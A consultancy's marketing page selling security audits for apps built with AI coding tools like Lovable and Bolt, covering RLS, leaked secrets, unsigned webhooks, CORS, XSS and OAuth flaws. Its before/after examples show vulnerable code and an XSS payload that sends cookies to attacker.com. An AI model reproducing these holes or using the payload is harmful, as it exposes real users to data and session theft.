afterbuild/ops
§ EX-06/security-hardening-expert
AI app security hardening expert

AI app security hardening — patch the RLS, secrets, and webhook gaps Lovable and Bolt shipped with

By Hyder Shah13 min readLast updated 2026-04-15
Quick verdict

AI app security hardening is not optional. 48% of AI-generated code ships with vulnerabilities, Supabase RLS hardening is skipped on ~70% of Lovable apps, webhook signature verification is absent, and a full secrets audit of an AI app usually finds keys in the client bundle. We audit every OWASP category, patch RLS, rotate secrets, sign webhooks, and ship a written report in 48 hours for a fixed $499. Updated Q2 2026: OWASP Top 10 for LLM Applications v2.0 was released in January and most AI-built apps hit 7+ of the 10, and California AB-2630 went into effect April 2026 requiring breach disclosure for AI-generated apps.

Why AI builders ship broken AI app security hardening

Security is the thing AI coding tools are worst at, by a wide margin. Veracode's 2025 report found 48% of AI-generated code contains vulnerabilities — roughly one in two files. The Register documented 170 Lovable apps leaking data from over 18,000 users in a single incident. NIST assigned CVE-2025-53773 (CVSS 9.6) to GitHub Copilot. The problem isn't a bad prompt; it's that the models optimise for demo-ability, and every security control is friction on the demo.

The specific patterns we see almost every time: Supabase Row Level Security disabled (or 'enabled' with policies that allow anyone to read everything), secrets hardcoded into the client bundle, OAuth callbacks misconfigured so tokens are exchanged insecurely, no rate limits so your app can be scraped or DoS'd, CSRF protection missing on mutating endpoints, user input passed straight to SQL or HTML, CORS set to '*' because that was the fastest way to make the preview work. Every one of these is catastrophic at launch. Every one is a half-day fix if you know what you're doing. New in Q1 2026: we are now seeing prompt injection attacks against AI-generated admin dashboards — LLM-backed features (summaries, inline copilots, chat panels) that accept user-supplied text without sanitization can be steered into exfiltrating private data, and AI builders rarely ship the allowlist checks that stop it.

Source: The Register — 170 Lovable apps leaked 18k users' data

§ MATRIX/ai-builder / failure-mode

Which AI builder shipped your broken AI app security hardening?

The AI app security hardening failure mode usually depends on the tool that shipped the code. Find your builder below, then read the matching problem page.

AI builderWhat breaks in AI app security hardeningGo to
LovableRLS disabled on ~70% of apps; Supabase public key granting full accessLovable RLS fix
Bolt.newHardcoded secrets in client bundle; Stripe webhooks unverifiedBolt security
v0Backend-less; when added, no rate limits, no input validationv0 auth
CursorSecurity drifts across files; OAuth flow sometimes split insecurelyCursor rescue
Replit AgentSecrets in repl env exposed; public URLs defaultReplit rescue
Claude CodeGenerally better — still misses rate limits and CORS hardeningClaude Code rescue
WindsurfEnterprise compliance gaps — audit logs, RBAC, SSO misconfigWindsurf compliance
Base44Proprietary runtime; we audit and migrate to owned stack if neededBase44 rescue
§ ANATOMY/ai app security hardening / failure

Anatomy of the 170-Lovable-apps breach — and how AI-built apps keep repeating it

The Register documented the pattern in February 2026: 170 Lovable-built apps leaked data from over 18,000 users in a single disclosure wave. The failure mode, quoted directly from the case study, was 'authenticated users were blocked; unauthenticated visitors had full access to all data.' That is not a missing policy — that is an inverted policy. The RLS rule was present, but its condition was reversed, and the Supabase anon key (which ships in every client bundle by design) became an open door to the entire database.

The upstream cause is demo-ability. Lovable, Bolt, v0, and their peers optimize for the moment the founder says 'wow, it works.' Every security control adds friction to that moment. RLS breaks the happy path during iteration, so the AI disables it. Rate limits make the model's test loop slow, so they go unimplemented. CORS restrictions block the preview, so CORS gets set to '*' and stays that way. Webhook signing secrets require a production environment to test, so the webhook handler just returns 200. Every individual decision is pragmatic for the demo and catastrophic at launch.

A practical illustration: a seed-stage SaaS reached us two days before their pen-test.
Hyder Shah· AI app security hardening rescue engineer

A practical illustration: a seed-stage SaaS reached us two days before their pen-test. Bolt.new had shipped them an admin panel gated by a client-side `if (user.role === 'admin') { show(<AdminPanel/>) }` check. The route itself was not protected server-side. A single DevTools edit to the user object bypassed the gate and exposed every admin API the UI called. The admin APIs, in turn, trusted the client's claim because the AI had not written server-side role verification. The pen-tester would have found it in ten minutes. We fixed it in two hours: role checks moved to server middleware, RLS policies added for admin-scoped tables, and a test that logs in as a regular user and attempts every admin route was wired into CI. The pen-test report came back clean on those vectors. The founder asked, justifiably: how was this ever supposed to work? It wasn't. The AI shipped the shape of a secured admin panel without the substance.

Veracode's 2025 State of Software Security confirmed the scale: 48% of AI-generated code contains known vulnerabilities. That is not a prediction — it is measured across a multi-year benchmark. Combined with NIST's CVE-2025-53773 (CVSS 9.6) against GitHub Copilot's auto-generated code paths, the evidence is unambiguous: AI-generated code is materially less secure than human-generated equivalent, and the delta is not shrinking. A security hardening pass is not optional for a launched AI-built app; it is the difference between running a real business and making the next disclosure headline.

When we audit, the same eight categories surface over and over: RLS disabled or inverted, secrets in the client bundle, webhook handlers without signature checks, CORS set to '*', no rate limiting, input pipes straight to SQL or HTML, OAuth redirects leaking tokens in URL fragments, and missing security headers (CSP, HSTS, X-Frame-Options). Each is a 2-to-8 hour fix individually. The value of the engagement is that we do them all, consistently, before a real user — or a researcher — finds them for you.

§ RESCUE/ai app security hardening / engagement

What a AI app security hardening rescue engagement ships

From first diagnostic to production handoff — the explicit steps on every AI app security hardening engagement.

  1. 01

    Free diagnostic

    We scan your repo and live URL for the top 10 AI-built-app failure modes: RLS, secrets, CORS, webhooks, rate limits, auth, input validation, CSP, CSRF, IDOR. Written triage in 48 hours.

  2. 02

    $499 security audit

    Full written audit — every finding has severity (critical/high/medium/low), CWE reference, file/line, and a specific patch. Delivered in 48 hours.

  3. 03

    Critical fixes first

    We patch everything critical and high in the same engagement if you want — RLS policies written and tested, secrets rotated and moved to env, webhook signature verification added, rate limits wired up.

  4. 04

    Regression guards

    We add automated checks so the AI can't reintroduce the holes: Zod validation at API boundaries, CSP headers, lint rules banning dangerouslySetInnerHTML, CI checks for hardcoded secrets.

  5. 05

    Written handoff

    You get the report, the patches, and a runbook: what to watch, what to rotate annually, what to add to the pentest when you raise your Series A.

§ AUDIT/ai app security hardening / first-pass

Every AI app security hardening rescue audit checks

The diagnostic pass on every AI app security hardening rescue. Each item takes under 10 minutes; together they cover the patterns that cause 90% of AI-built-app failures.

  1. 01
    Supabase RLS on every table

    We enumerate every table and check: is RLS enabled, and is at least one non-trivial policy defined. Policies like `USING (true)` are flagged — they satisfy the 'enabled' check without enforcing anything.

  2. 02
    Anon-key surface mapping

    We map every read and write the anon key can perform. If the anon key can read any user-private table, it's critical.

  3. 03
    Secrets grep across client bundle

    The built JS bundle is greppable. We search for sk_, sk_live, sk_test, service_role, API_KEY, common secret patterns. Every match is a critical finding.

  4. 04
    Webhook signature verification

    Stripe, GitHub, Clerk — every webhook handler must verify the signature before acting. Unverified handlers are trivially forgeable.

  5. 05
    Rate limits on auth endpoints

    Sign-up, sign-in, password reset. No rate limit means DoS-able and brute-forceable. We check for Upstash, Vercel Edge rate limits, or middleware.

  6. 06
    Input validation with Zod or equivalent

    Every API route must parse req.body before it reaches the database. Raw concatenation into SQL or HTML is a critical finding (OWASP A03).

  7. 07
    CORS policy

    Access-Control-Allow-Origin should be an explicit allowlist, not '*'. We check every API response.

  8. 08
    CSP, HSTS, and security headers

    We run Mozilla Observatory against the live URL. Scores under B are flagged; we tune next.config.js to ship the right headers.

  9. 09
    OAuth redirect and token flow

    Tokens should arrive via POST, not URL fragment. Redirect URIs should exactly match provider allowlists. Token refresh should be server-side.

  10. 10
    IDOR checks on object access

    Can user A access user B's object by guessing the ID? We test every authenticated GET, PATCH, DELETE with the wrong user's UUID.

  11. 11
    Dependency CVE scan

    npm audit or pnpm audit, cross-referenced with NIST NVD. Known criticals in shipped dependencies are flagged.

§ DIFF/ai app security hardening / before-after

Common AI app security hardening patterns we fix

These are the shapes AI-generated code arrives in — and the shape we leave behind.

RLS disabled 'because it was blocking the demo'
✕ before · ai-shipped
tsx
01`ALTER TABLE users DISABLE ROW LEVEL SECURITY;` — anon key reads and writes every row. 170-Lovable-apps pattern.
RLS disabled 'because it was blocking the demo'
✓ after · afterbuild
tsx
01RLS enabled; policies scoped with `auth.uid() = user_id` on owning tables and role-checked on admin tables. Tested against every role.
RLS disabled 'because it was blocking the demo'
The signature-less webhook
✕ before · ai-shipped
tsx
01`export async function POST(req) { const body = await req.json(); await markOrderPaid(body.order_id); return new Response('ok'); }` — anyone can POST.
The signature-less webhook
✓ after · afterbuild
tsx
01Stripe-Signature header parsed, constructEvent called with the webhook secret, handler runs only on verified events. Idempotency key stored to prevent replay.
The signature-less webhook
The service-role key in the browser
✕ before · ai-shipped
tsx
01`NEXT_PUBLIC_SUPABASE_SERVICE_ROLE_KEY=...` in .env. Key ships in the client bundle. App has full admin access from any user's browser.
The service-role key in the browser
✓ after · afterbuild
tsx
01Service role key confined to server routes and environment. Client uses anon key only. Env var name without NEXT_PUBLIC_ prefix, pre-flight check enforces this.
The service-role key in the browser
The wide-open CORS
✕ before · ai-shipped
tsx
01`Access-Control-Allow-Origin: *` on every API response. Any origin can call your API with browser-held cookies.
The wide-open CORS
✓ after · afterbuild
tsx
01Explicit allowlist keyed to deployment environment. Production allows only your domain; preview allows your preview URL.
The wide-open CORS
SQL concatenation in a Supabase RPC
✕ before · ai-shipped
tsx
01`create function search(q text) returns table(...) as $$ ... where name like '%' || q || '%' $$` — injection trivial once quoted.
SQL concatenation in a Supabase RPC
✓ after · afterbuild
tsx
01Parameterized queries, `format()` with `%L` or prepared statements, input validation before the call.
SQL concatenation in a Supabase RPC
User HTML rendered with dangerouslySetInnerHTML
✕ before · ai-shipped
tsx
01Comments or bios rendered via `dangerouslySetInnerHTML`. User injects `<script>fetch('https://attacker.com/?c='+document.cookie)</script>`.
User HTML rendered with dangerouslySetInnerHTML
✓ after · afterbuild
tsx
01DOMPurify sanitization, or render as plain text, or restrict to a markdown subset with a vetted renderer.
User HTML rendered with dangerouslySetInnerHTML
OAuth tokens in the URL fragment
✕ before · ai-shipped
tsx
01OAuth callback returns `#access_token=...` which JavaScript parses client-side. Tokens leak to analytics, referrers, browser history.
OAuth tokens in the URL fragment
✓ after · afterbuild
tsx
01PKCE + server-side token exchange. Tokens never touch the URL. Session cookie set HttpOnly, Secure, SameSite=Lax.
OAuth tokens in the URL fragment
§ FLAGS/ai app security hardening / red-signals

AI app security hardening red flags in AI-built code

If any of these are true in your repo, the rescue is probably worth more than the rewrite.

flag
signal
why it matters
Supabase anon key can read user_emails, user_profiles, or similar tables when tested anonymously
RLS is disabled or the policy is trivial. Direct path to the 170-Lovable-apps failure mode.
Client bundle contains a string matching `sk_live_` or `sk_test_`
Stripe secret key is in the browser. Revoke immediately and rotate.
Webhook handler returns 200 without reading `Stripe-Signature`
Forgeable webhook. Any attacker can flip orders to paid, trigger refunds, or spoof subscription events.
`Access-Control-Allow-Origin: *` on authenticated API routes
CSRF becomes trivial when combined with cookie-based auth.
Password reset links include the token as a URL query parameter, not a POST body
Tokens leak to analytics, referrers, proxies, browser history. Classic Session Fixation / token leakage.
No rate limit on /api/auth/signup or /api/auth/reset-password
Trivially brute-forceable. Credential stuffing and account enumeration attacks run uncontested.
User-supplied HTML rendered via dangerouslySetInnerHTML without a sanitizer
Stored XSS. The attacker owns every viewer's session.
§ PRICING/ai app security hardening / fixed-price

Fixed-price AI app security hardening engagements

No hourly meter. Scope agreed up front, written fix plan, delivered on date.

price
Free
turnaround
Free diagnostic
scope
Top-10 scan + written triage in 48 hours.
View scope
featured
price
$499
turnaround
Security audit
scope
Full written audit, 48hr turnaround, every finding with a patch.
View scope
price
From $499
turnaround
Emergency triage
scope
Mid-incident? 24hr response + fix plan.
View scope
price
$3,999
turnaround
Break the fix loop
scope
Audit + critical fixes + regression guards + tests.
View scope
§ EXAMPLES/ai app security hardening / real-scopes

What AI app security hardening rescues actually cost

Anonymized, representative scopes from recent AI app security hardening rescues. Every price is the one we actually quoted.

Small rescue
$1,499

A founder who built a Lovable habit-tracker, has 90 beta users, and is scared to launch publicly after reading The Register piece. We audit, find 11 findings (3 critical), write the RLS policies and wire webhook signing.

Scope
48-hour audit + critical and high remediation. RLS policies, webhook signing, secret rotation, env var guards.
Duration
1 week
Medium rescue
$3,999

A seed-stage SaaS on Bolt + Supabase preparing for SOC 2 Type 1. Enterprise customer asked for a third-party security review in the sales cycle.

Scope
Full audit, remediation of every critical and high, CSP implementation, audit log bootstrap, pen-test prep document.
Duration
3 weeks
Large rescue
$12,499+

A growth-stage fintech with a Lovable admin tool processing real money. Regulatory inquiry triggered a security review with a 60-day remediation window.

Scope
Full audit, remediation including auth overhaul, RBAC, audit logs, SIEM integration, and formal response to the inquiry's findings.
Duration
6-8 weeks
§ DECISION/ai app security hardening / migrate-or-patch

Patch in place, hard-rotate secrets, or full auth migration?

Roughly 70% of security engagements are patches in place: enable RLS, sign the webhooks, move secrets to server-side env vars, deploy security headers. The app stays where it is, the team keeps using their AI builder, and the rescue ships in a week. Most rescues fall into this category and they end with the original codebase materially safer with no architectural change.

About 20% require a hard secret rotation alongside the patches. The signal is that secrets have been in the client bundle for long enough — or visible in a public Git history — that the right assumption is they are compromised. Stripe restricted keys can be revoked in seconds; Supabase service role keys require a project-level rotation that can disrupt active sessions; OAuth client secrets need coordination with the provider's allowlist. We sequence the rotation to minimize user impact and document every step in case a future incident requires re-examining the timeline.

The remaining 10% need a full auth migration. The signal is that the auth provider itself has been mis-implemented in a way that can't be patched cleanly — for example, sessions stored in localStorage instead of HttpOnly cookies, or roles stored in the JWT claim without server-side verification. In those cases we recommend moving to Clerk or rebuilding on Supabase Auth with the patterns done correctly. The migration is invisible to most users (passwordless re-verification email plus a one-shot token exchange) but it does require a planned cutover window and a rollback plan. We have done this many times and the pattern is now standard.

§ RUNBOOK/ai app security hardening / references

AI app security hardening runbook and reference material

The documentation, CLIs, and specs we rely on for every AI app security hardeningengagement. We cite, we don't improvise.

§ FAQ/ai app security hardening / founders-ask

AI app security hardening questions founders ask

FAQ
How bad is AI-generated code for AI app security hardening?
Veracode 2025: 48% contains vulnerabilities. The Register documented 170 Lovable apps leaking 18,000 users' data through disabled RLS. NIST assigned CVE-2025-53773 (CVSS 9.6) to a GitHub Copilot issue. AI app security hardening is not hypothetical — the bad apps hit the news regularly. The numbers are getting worse as models get better at producing convincing code that hides its flaws under more sophisticated layers.
What is the most common Supabase RLS hardening finding?
Supabase RLS hardening lands on disabled or misconfigured row-level security. Roughly 70% of Lovable apps we audit have RLS off on at least one table. Combined with the fact that the Supabase anon key ships in the client bundle, this means anyone can read the entire database. The second most common is webhook handlers without signature verification — equally serious, equally easy to fix once spotted.
Can I stay on Lovable during AI app security hardening?
Yes. AI app security hardening runs against your existing Supabase project and deploy target. RLS policies, secrets audit, webhook signature verification — all done in place. You keep using Lovable for UI iteration; we harden the backend they shipped. The catch is that Lovable's chat-driven edits will sometimes try to undo your hardening; we install lint rules and CI checks that block those regressions.
What does a 48-hour secrets audit for an AI app deliver?
A secrets audit AI app report includes a written PDF + markdown document with every finding categorized (critical/high/medium/low), CWE reference, file/line number, and a specific patch or fix recommendation. Plus a 30-min call to walk through it. The report is structured so a future engineer or compliance reviewer can pick it up cold and understand each finding without rereading the source code.
Do you run full pentests or just AI app security hardening?
We focus on application-layer AI app security hardening. If you need an ISO 27001 or SOC 2 pentest, we refer you to partners and brief them with our audit so they hit the ground running. Most pentest partners we work with have noted that our audits cover roughly 70% of what their automated scanners would have flagged, which means their human time is spent on the genuinely interesting findings.
How does AI app security hardening handle GDPR and compliance?
We cover the technical prerequisites that AI app security hardening touches — data minimization, encryption at rest, audit logs, right-to-delete. We're not lawyers, so we don't write your privacy policy. We can however connect you to lawyers who specialize in tech privacy and have a working understanding of what AI-built apps look like.
Is $499 really enough for real AI app security hardening?
For a typical Lovable/Bolt/v0 MVP, yes. AI app security hardening at this tier uses a standardized 10-point checklist against known AI-builder failure modes. Larger apps quote proportionally. The reason the price stays low for small apps is that the patterns repeat — finding the 12th hardcoded secret during a secrets audit AI app takes about as long as finding the first.
A security researcher contacted me — can you handle emergency AI app security hardening?
Email us. The first hour of emergency AI app security hardening is triage — what was reported, what is the actual exposure, what is the immediate fix. We draft a response to the researcher, scope a same-day patch (usually Supabase RLS hardening or webhook signature verification), and write a post-incident note for customers if disclosure is required. The playbook is well-rehearsed.
How do I know the AI app security hardening lasted after handoff?
Two ways. First, every AI app security hardening fix ships with an automated check in CI that fails the build if the protection is removed — lint rule, Zod schema, CSP header, RLS pgTAP test. Second, we offer a quarterly mini-audit retainer that re-runs the checklist against the current main branch and reports any regressions. Most clients run it once and decide whether to commit to the cadence based on the result.
Next step

Your AI builder shipped broken AI app security hardening. We ship the fix.

Send the repo. We'll tell you exactly what's wrong in your AI app security hardening layer — and the fixed price to ship it — in 48 hours.

Book free diagnostic →